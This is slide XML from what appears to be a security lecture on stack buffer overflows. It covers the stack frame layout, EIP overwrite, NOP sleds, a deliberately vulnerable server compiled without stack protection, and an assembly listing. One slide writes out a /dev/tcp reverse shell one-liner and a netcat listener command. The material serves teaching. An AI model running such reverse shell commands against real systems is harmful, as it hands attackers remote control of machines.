              <a:t>(message));</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close(</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sleep(1);</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return 0;</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a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>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117</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27264826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8920"/>
            <a:ext cx="9700063" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Stack when it starts executing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="188046" y="1490147"/>
            <a:ext cx="6722464" cy="4737050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The basic idea is to use a buffer overflow to have the program execute code that gives us control.  For example, execute a “reverse shell”:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Reverse shell: /bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> &gt;&amp; /dev/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>/127.0.0.1/4444 0 &gt;&amp;1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-3429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We can then use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>netcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>) to connect to the interactive shell we started. [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> –</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>lvp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> 4444]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-3429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We do this by putting code on the stack (in buffer) via the user supplied argument and (by overflowing the buffer), having EIP point to that new code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-3429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There are two problems:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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We need to get the attacking program into buffer using allowed characters (for example “0” can’t be in the string.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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We need EIP to point into buffer that, in a reliable way,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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One way to do this is to position a “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> sled,” which consists of one byte “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>” instructions, before the code we want to execute.  Then if EIP point anywhere in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>nop</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> sled, it will land in our code.</a:t>
            </a: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a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" sz="22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118</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5BB81613-3CDD-C143-B4F9-4B7B133140E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6826367" y="5797894"/>
            <a:ext cx="594109" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>esp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Straight Arrow Connector 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F271F373-90E0-1243-A517-158BED29F8C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7493632" y="5995600"/>
            <a:ext cx="46654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0939DD0-0F5B-CF48-8E9D-4340AA594425}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8041816" y="4288168"/>
            <a:ext cx="2559684" cy="169441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EDAE496-4DC4-DD46-A6EA-4BD549AE8B0B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8462536" y="4895531"/>
            <a:ext cx="1554301" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>buffer[1024]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13D2195E-0076-DA40-9B4E-E87F3F86C5EA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8036202" y="2955186"/>
            <a:ext cx="2559684"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BB1CE8E-10CB-964F-9504-48F0EBC1A1B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11352919" y="3291454"/>
            <a:ext cx="0" cy="16702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1AA56B-5471-D441-A008-CE0CD688A7AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10614463" y="2563735"/>
            <a:ext cx="1854628" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>addresses</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>decreasing</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{184B1AB0-C7E4-8843-ADBE-37D2F9126DA4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8462536" y="2965143"/>
            <a:ext cx="1091381" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>old </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0106224-4F84-D94B-8C3C-FD3478EB4026}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8041816" y="2577030"/>
            <a:ext cx="2559684"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974C6D1-3499-C84E-BA73-82DED95E40FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8218120" y="2598562"/>
            <a:ext cx="2365639" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>return address (EIP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{702D667E-6194-2B4C-BCBF-F0B15CD4C671}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8041817" y="2206323"/>
            <a:ext cx="2559684"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91F718E-7DED-5A4B-9CA1-99B35C469494}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8535322" y="2227855"/>
            <a:ext cx="1740778" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>input args (in)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C95F426-85C5-7247-B625-22E8E15C0043}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6807772" y="2765419"/>
            <a:ext cx="662811" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ebp</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Straight Arrow Connector 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{51A8862A-D690-4947-9ED0-088EDD98F502}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7475037" y="2963125"/>
            <a:ext cx="46654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3660850-0BBE-1641-BA54-C2610CE1798F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8038127" y="3338680"/>
            <a:ext cx="2559684" cy="46946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833F3BB-6A65-9F46-B67F-BCD61310B023}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8448822" y="3397250"/>
            <a:ext cx="1086473" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>to_read</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Rectangle 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{258502FA-19FD-B642-B265-4B4295D2BA7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8038123" y="3823590"/>
            <a:ext cx="2559684" cy="46946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4EBC05A1-4ACD-9449-B56B-B5987CC52D53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8462673" y="3882160"/>
            <a:ext cx="1464334" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>read_bytes</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15608067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59720"/>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Assembly code for function</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="720436" y="1052893"/>
            <a:ext cx="7108615" cy="2376107"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" indent="-457200" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-stack-protector -S </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>exploitable_server.c</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>vuln_read</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vuln_read</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pushq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cfi_def_cfa_offset</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> 16</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cfi_offset</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-16</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cfi_def_cfa_register</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subq$1072, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>rsp</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imm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = 0x430</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$4, %</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>eax</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edx</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r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, -4(%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-1044(%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rcx</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rcx</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rsi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
